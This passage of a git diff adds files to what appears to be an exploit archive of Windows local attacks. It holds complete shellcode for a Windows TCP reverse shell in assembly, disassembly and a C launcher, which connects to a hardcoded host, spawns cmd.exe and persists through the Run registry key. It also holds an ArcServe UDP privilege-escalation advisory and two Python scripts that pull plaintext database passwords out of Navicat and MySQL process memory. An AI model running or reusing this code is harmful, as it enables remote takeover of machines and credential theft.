dword [esi] + +add esp,12 + +mov [esi+8],dword eax ;ExitProcess() at offset 8 +;----------------------------------------------------- +;loading ws2_32.dll + + +xor ecx,ecx +push ecx +push 0x41797261 +push 0x7262694c +push 0x64616f4c + +lea ecx,[esp] + +push ecx +push edi + +call dword [esi] + +add esp,12 + +xor ecx,ecx +push 0x41416c6c +mov [esp+2],word cx +push 0x642e3233 +push 0x5f327377 +lea ecx,[esp] + +push ecx +call eax +add esp,8 + +mov edi,eax ;ws2_32.dll + +;----------------------------------- +;finding address of WSAStartup() +xor ecx,ecx +push 0x41417075 +mov [esp+2],word cx +push 0x74726174 +push 0x53415357 + +lea ecx,[esp] +push ecx +push eax + +call dword [esi] +add esp,12 + +mov [esi+12],dword eax ;WSAStartup() at offset 12 + +;------------------------------------------ +;finding address of WSASocketA() + +xor ecx,ecx +push 0x42424174 +mov [esp+2],word cx +push 0x656b636f +push 0x53415357 + +lea ecx,[esp] + +push ecx +push edi + +call dword [esi] +add esp,12 + +mov [esi+16],dword eax ;WSASocketA() at offset 16 +;----------------------------- +;finding address of WSAConnect() +xor ecx,ecx +push 0x41417463 +mov [esp+2],word cx +push 0x656e6e6f +push 0x43415357 + +lea ecx,[esp] + +push ecx +push edi + +call dword [esi] +add esp,12 + +mov [esi+20],dword eax ;WSAConnect() at offset 20 +;------------------------------------------------ + +;WSAStartup(514, &WSADATA) + +xor ecx,ecx +push ecx +mov cx,400 + +sub esp,ecx + +lea ecx,[esp] + +xor ebx,ebx +mov bx,514 + +push ecx +push ebx + +call dword [esi+12] + +;------------------------------- + +;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL) + +xor ecx,ecx +push ecx +push ecx +push ecx + +mov cl,6 +push ecx + +sub ecx,5 +push ecx + +inc ecx +push ecx + +call dword [esi+16] + +xchg edi,eax ;SOCKET + +;-------------------------------------------------- +;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL) +xor ecx,ecx +push ecx +push ecx +push ecx +push ecx + +mov [esp],byte 2 +mov [esp+2],word 0x5c11 ;port 4444 (change it if U want) +mov [esp+4],dword 0x81e8a8c0 ;Change it + +connect: +xor ecx,ecx +lea ebx,[esp] + +push ecx +push ecx +push ecx +push ecx + + +mov cl,16 + + +push ecx +push ebx +push edi + +call dword [esi+20] +xor ecx,ecx + +cmp eax,ecx +jnz connect +;---------------------------------------------- + +xor ecx,ecx + +sub esp,16 +lea edx,[esp] ;PROCESS_INFORMATION + +push edi +push edi +push edi +push ecx +push word cx +push word cx + +mov cl,255 +inc ecx + +push ecx +xor ecx,ecx + +push ecx +push ecx +push ecx +push ecx +push ecx +push ecx +push ecx +push ecx +push ecx +push ecx + +mov cl,68 + +push ecx + +lea ecx,[esp] + + +xor edx,edx +push 0x41657865 +mov [esp+3],byte dl +push 0x2e646d63 + +lea edx,[esp] +;----------------------------- +;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info) + +push ebx +push ecx + +xor ecx,ecx + +push ecx +push ecx +push ecx + +inc ecx +push ecx +xor ecx,ecx + +push ecx +push ecx +push edx +push ecx + +call dword [esi+4] + +push eax +call dword [esi+8] +*/ + + +/* +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 48 10 mov 0x10(%eax),%ecx + 12: 8b 59 3c mov 0x3c(%ecx),%ebx + 15: 01 cb add %ecx,%ebx + 17: 8b 5b 78 mov 0x78(%ebx),%ebx + 1a: 01 cb add %ecx,%ebx + 1c: 8b 73 20 mov 0x20(%ebx),%esi + 1f: 01 ce add %ecx,%esi + 21: 31 d2 xor %edx,%edx + +00000023 : + 23: 42 inc %edx + 24: ad lods %ds:(%esi),%eax + 25: 01 c8 add %ecx,%eax + 27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 2d: 75 f4 jne 23 + 2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 36: 75 eb jne 23 + 38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 3f: 75 e2 jne 23 + 41: 8b 73 1c mov 0x1c(%ebx),%esi + 44: 01 ce add %ecx,%esi + 46: 8b 14 96 mov (%esi,%edx,4),%edx + 49: 01 ca add %ecx,%edx + 4b: 31 c0 xor %eax,%eax + 4d: 50 push %eax + 4e: 83 ec 18 sub $0x18,%esp + 51: 8d 34 24 lea (%esp),%esi + 54: 89 16 mov %edx,(%esi) + 56: 89 cf mov %ecx,%edi + 58: 68 73 41 42 42 push $0x42424173 + 5d: 66 89 44 24 02 mov %ax,0x2(%esp) + 62: 68 6f 63 65 73 push $0x7365636f + 67: 68 74 65 50 72 push $0x72506574 + 6c: 68 43 72 65 61 push $0x61657243 + 71: 8d 04 24 lea (%esp),%eax + 74: 50 push %eax + 75: 51 push %ecx + 76: ff d2 call *%edx + 78: 83 c4 10 add $0x10,%esp + 7b: 89 46 04 mov %eax,0x4(%esi) + 7e: 31 c9 xor %ecx,%ecx + 80: 68 65 73 73 41 push $0x41737365 + 85: 88 4c 24 03 mov %cl,0x3(%esp) + 89: 68 50 72 6f 63 push $0x636f7250 + 8e: 68 45 78 69 74 push $0x74697845 + 93: 8d 0c 24 lea (%esp),%ecx + 96: 51 push %ecx + 97: 57 push %edi + 98: ff 16 call *(%esi) + 9a: 83 c4 0c add $0xc,%esp + 9d: 89 46 08 mov %eax,0x8(%esi) + a0: 31 c9 xor %ecx,%ecx + a2: 51 push %ecx + a3: 68 61 72 79 41 push $0x41797261 + a8: 68 4c 69 62 72 push $0x7262694c + ad: 68 4c 6f 61 64 push $0x64616f4c + b2: 8d 0c 24 lea (%esp),%ecx + b5: 51 push %ecx + b6: 57 push %edi + b7: ff 16 call *(%esi) + b9: 83 c4 0c add $0xc,%esp + bc: 31 c9 xor %ecx,%ecx + be: 68 6c 6c 41 41 push $0x41416c6c + c3: 66 89 4c 24 02 mov %cx,0x2(%esp) + c8: 68 33 32 2e 64 push $0x642e3233 + cd: 68 77 73 32 5f push $0x5f327377 + d2: 8d 0c 24 lea (%esp),%ecx + d5: 51 push %ecx + d6: ff d0 call *%eax + d8: 83 c4 08 add $0x8,%esp + db: 89 c7 mov %eax,%edi + dd: 31 c9 xor %ecx,%ecx + df: 68 75 70 41 41 push $0x41417075 + e4: 66 89 4c 24 02 mov %cx,0x2(%esp) + e9: 68 74 61 72 74 push $0x74726174 + ee: 68 57 53 41 53 push $0x53415357 + f3: 8d 0c 24 lea (%esp),%ecx + f6: 51 push %ecx + f7: 50 push %eax + f8: ff 16 call *(%esi) + fa: 83 c4 0c add $0xc,%esp + fd: 89 46 0c mov %eax,0xc(%esi) + 100: 31 c9 xor %ecx,%ecx + 102: 68 74 41 42 42 push $0x42424174 + 107: 66 89 4c 24 02 mov %cx,0x2(%esp) + 10c: 68 6f 63 6b 65 push $0x656b636f + 111: 68 57 53 41 53 push $0x53415357 + 116: 8d 0c 24 lea (%esp),%ecx + 119: 51 push %ecx + 11a: 57 push %edi + 11b: ff 16 call *(%esi) + 11d: 83 c4 0c add $0xc,%esp + 120: 89 46 10 mov %eax,0x10(%esi) + 123: 31 c9 xor %ecx,%ecx + 125: 68 63 74 41 41 push $0x41417463 + 12a: 66 89 4c 24 02 mov %cx,0x2(%esp) + 12f: 68 6f 6e 6e 65 push $0x656e6e6f + 134: 68 57 53 41 43 push $0x43415357 + 139: 8d 0c 24 lea (%esp),%ecx + 13c: 51 push %ecx + 13d: 57 push %edi + 13e: ff 16 call *(%esi) + 140: 83 c4 0c add $0xc,%esp + 143: 89 46 14 mov %eax,0x14(%esi) + 146: 31 c9 xor %ecx,%ecx + 148: 51 push %ecx + 149: 66 b9 90 01 mov $0x190,%cx + 14d: 29 cc sub %ecx,%esp + 14f: 8d 0c 24 lea (%esp),%ecx + 152: 31 db xor %ebx,%ebx + 154: 66 bb 02 02 mov $0x202,%bx + 158: 51 push %ecx + 159: 53 push %ebx + 15a: ff 56 0c call *0xc(%esi) + 15d: 31 c9 xor %ecx,%ecx + 15f: 51 push %ecx + 160: 51 push %ecx + 161: 51 push %ecx + 162: b1 06 mov $0x6,%cl + 164: 51 push %ecx + 165: 83 e9 05 sub $0x5,%ecx + 168: 51 push %ecx + 169: 41 inc %ecx + 16a: 51 push %ecx + 16b: ff 56 10 call *0x10(%esi) + 16e: 97 xchg %eax,%edi + 16f: 31 c9 xor %ecx,%ecx + 171: 51 push %ecx + 172: 51 push %ecx + 173: 51 push %ecx + 174: 51 push %ecx + 175: c6 04 24 02 movb $0x2,(%esp) + 179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp) + 180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp) + 187: 81 + +00000188 : + 188: 31 c9 xor %ecx,%ecx + 18a: 8d 1c 24 lea (%esp),%ebx + 18d: 51 push %ecx + 18e: 51 push %ecx + 18f: 51 push %ecx + 190: 51 push %ecx + 191: b1 10 mov $0x10,%cl + 193: 51 push %ecx + 194: 53 push %ebx + 195: 57 push %edi + 196: ff 56 14 call *0x14(%esi) + 199: 31 c9 xor %ecx,%ecx + 19b: 39 c8 cmp %ecx,%eax + 19d: 75 e9 jne 188 + 19f: 31 c9 xor %ecx,%ecx + 1a1: 83 ec 10 sub $0x10,%esp + 1a4: 8d 14 24 lea (%esp),%edx + 1a7: 57 push %edi + 1a8: 57 push %edi + 1a9: 57 push %edi + 1aa: 51 push %ecx + 1ab: 66 51 push %cx + 1ad: 66 51 push %cx + 1af: b1 ff mov $0xff,%cl + 1b1: 41 inc %ecx + 1b2: 51 push %ecx + 1b3: 31 c9 xor %ecx,%ecx + 1b5: 51 push %ecx + 1b6: 51 push %ecx + 1b7: 51 push %ecx + 1b8: 51 push %ecx + 1b9: 51 push %ecx + 1ba: 51 push %ecx + 1bb: 51 push %ecx + 1bc: 51 push %ecx + 1bd: 51 push %ecx + 1be: 51 push %ecx + 1bf: b1 44 mov $0x44,%cl + 1c1: 51 push %ecx + 1c2: 8d 0c 24 lea (%esp),%ecx + 1c5: 31 d2 xor %edx,%edx + 1c7: 68 65 78 65 41 push $0x41657865 + 1cc: 88 54 24 03 mov %dl,0x3(%esp) + 1d0: 68 63 6d 64 2e push $0x2e646d63 + 1d5: 8d 14 24 lea (%esp),%edx + 1d8: 53 push %ebx + 1d9: 51 push %ecx + 1da: 31 c9 xor %ecx,%ecx + 1dc: 51 push %ecx + 1dd: 51 push %ecx + 1de: 51 push %ecx + 1df: 41 inc %ecx + 1e0: 51 push %ecx + 1e1: 31 c9 xor %ecx,%ecx + 1e3: 51 push %ecx + 1e4: 51 push %ecx + 1e5: 52 push %edx + 1e6: 51 push %ecx + 1e7: ff 56 04 call *0x4(%esi) + 1ea: 50 push %eax + 1eb: ff 56 08 call *0x8(%esi) +*/ + + +#include +#include +#include + +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08"; + +int main(int li,char *a[]) +{ +char info[200]; +DWORD l; +HKEY i; + + + RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i); + int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l); + + if(i!=0) + { + RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0])); + RegCloseKey(i); + } + else + RegCloseKey(i); + + + + + int mode; + + + + if(li==1) + mode=1; + else + mode=atoi(a[1]); + +switch(mode) +{ + + + + case 78: + (* (int(*)())shellcode )(); + break; + + case 1: + default: + ShellExecute(NULL,NULL,a[0],"78",NULL,0); + break; +} + + + return 0; + +} diff --git a/platforms/windows/local/40335.txt b/platforms/windows/local/40335.txt new file mode 100755 index 000000000..b53530c83 --- /dev/null +++ b/platforms/windows/local/40335.txt @@ -0,0 +1,72 @@ +Title: ArcServe UDP - Unquoted Service Path Privilege Escalation +CWE Class: CWE-427: Uncontrolled Search Path Element +Date: 04/09/2016 +Vendor: ArcServe +Product: ArcServe UDP Standard Edition for Windows, TRIAL +Type: Backup Software +Version: 6.0.3792 Update 2 Build 516 +Download URL: http://arcserve.com/free-backup-software-trial/ +Tested on: Windows 7x86 EN +Release Mode: coordinated release + + +- 1. Product Description: - +A comprehensive solution that empowers even a one-person IT department to protect virtual and physical environments with a high degree of simplicity: +Design and manage your entire data protection strategy with a unified management console +Scale your data backup coverage as your organization grows with the push of a button + +- 2. Vulnerability Details: - +ArcServe UDP for Windows installs various services. +One of them is the "Arcserve UDP Update Service (CAARCUpdateSvc)" running as SYSTEM. +This particular service has an insecurely quoted path. +Other services where correctly quoted. +An attacker with write permissions on the root-drive or directory in the search path +could place a malicious binary and elevate privileges. + +- 3. PoC Details: - +There are various ways to audit for this type of vulnerability. +This proof-of-concept demonstrates both an automated and manual way. + +Step 1: Identify the issue +Automatic: use the windows-privesc-check toolkit to audit the local system. +Manual: run 'sc qc CAARCUpdateSvc' and confirm it has an unquoted service path. + +Output: C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe +This should be: "C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe" + +Step 2: Assess if exploitation is possible +To exploit this issue assess the permissions of each folder in the path using space as a token. + +If any of the directories is writable for a non-administrative user, try to exploit the issue. + +Step 3 Exploitation: +Place a binary with the correct name in the vulnerable directory. +Reboot the system and validate your payload is executed with SYSTEM privileges + +- 4. Vendor Mitigation: - +Create an update for the product which add quotes to the path. + +While the update is being developed customers could apply a manual fix: +Open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services +Add quotes to the ImagePath value of the relevant service. + +- 5. End-user Mitigation: - +A patch has been released by Arcserve. +All customer should upgrade to the latest version as described in the release notes: +http://documentation.arcserve.com/Arcserve-UDP/Available/V6/ENU/Bookshelf_Files/HTML/Update3/Default.htm#Update3/upd3_Issues_Fixed.htm%3FTocPath%3D_____6 + +- 6. Author: - +sh4d0wman / Herman Groeneveld +herman_worldwide AT hotmail. com + +- 7. Timeline: - +* 01/06/2016: Vulnerability discovery +* 18/06/2016: Request sent to info@arcserve.com for a security point-of-contact +* 21/06/2016: Received contact but no secure channel. Requested confirmation to send PoC over unsecure channel +* 22/06/2016: vendor supplied PGP key, vulnerability PoC sent +* 09/07/2016: Received information: 2 out of 3 issues have fixes pending. +Vendor requests additional mitigation techniques for the third issue. +* 13/07/2016: Sent vendor various mitigation solutions and their limitations. +* 13/08/2016: Vendor informs release is pending for all discovered issues. +* 15/08/2016: Vendor requests text for release bulletin. +* 19/08/2016: A fix has been released. diff --git a/platforms/windows/local/40336.py b/platforms/windows/local/40336.py new file mode 100755 index 000000000..443e63817 --- /dev/null +++ b/platforms/windows/local/40336.py @@ -0,0 +1,70 @@ +##### +# Navicat Premium 11.2.11 (64bit) Local Password Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://www.navicat.com/ +# Date 05/09/2016 +# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# +# http://www.black-rose.ml +# +# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/) +##### +# Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied password in order to gain access to the database. +# Proof-Of-Concept Code: +##### + +import time +from winappdbg import Debug, Process + +count = 0 +found = 0 +filename = "navicat.exe" +process_pid = 0 +memory_dump = [] + +def b2h(str): + return ''.join(["%02X " % ord(x) for x in str]).strip() + +def h2b(str): + bytes = [] + str = ''.join(str.split(" ")) + for i in range(0, len(str), 2): + bytes.append(chr(int(str[i:i+2], 16))) + return ''.join(bytes) + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'): + memory_dump.append(process.read(address,30)) + memory_dump.pop(0) + for i in range(len(memory_dump)): + str = b2h(memory_dump[i]) + first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1] + last = first.split("00 ") + if last[0]: + count = count+1 + found = 1 + print "[+] Password for connection #%d found as %s" % (count, h2b(last[0])) + if found == 0: + print "[-] Password not found! Make sure the client is connected at least to one database." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() + + + diff --git a/platforms/windows/local/40337.py b/platforms/windows/local/40337.py new file mode 100755 index 000000000..6dc80cc73 --- /dev/null +++ b/platforms/windows/local/40337.py @@ -0,0 +1,93 @@ +##### +# MySQL 5.5.45 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://www.mysql.com +# Date 05/09/2016 +# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# +# http://www.black-rose.ml +# +# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/) +##### +# MySQL v5.5.45 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to the database. +# Proof-Of-Concept Code: +##### + +import time +from winappdbg import Debug, Process + +def b2h(str): + return ''.join(["%02X " % ord(x) for x in str]).strip() + +def h2b(str): + bytes = [] + str = ''.join(str.split(" ")) + + for i in range(0, len(str), 2): + bytes.append(chr(int(str[i:i+2], 16))) + + return ''.join(bytes) + +usr = '' +pwd = '' +count = 0 +filename = "mysql.exe" +process_pid = 0 +memory_dump = [] +passwd = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'): + memory_dump.append(process.read(address,30)) + for i in range(len(memory_dump)): + str = b2h(memory_dump[i]) + first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1] + last = first.split(" 00 2D 70") + if last[0]: + usr = h2b(last[0]) + + memory_dump = [] + for address in process.search_bytes('\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'): + memory_dump.append(process.read(address,100)) + sorted(set(memory_dump)) + for i in range(len(memory_dump)): + str = b2h(memory_dump[i]) + string = str.split('00 8F') + for x in range(len(string)): + if x == 1: + passwd = string + try: + pwd = h2b(passwd[1].split('00 00')[0]) + except: + pass + + print "[~] Trying to extract credentials from memory.." + time.sleep(1) + if usr != '' and pwd != '': + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % usr + print "[+] Password: %s" % pwd + else: + print "[-] Credentials not found!" + else: + print "[-] No process found with name '%s'" % (filename) + + debug.loop() +finally: + debug.stop() + + +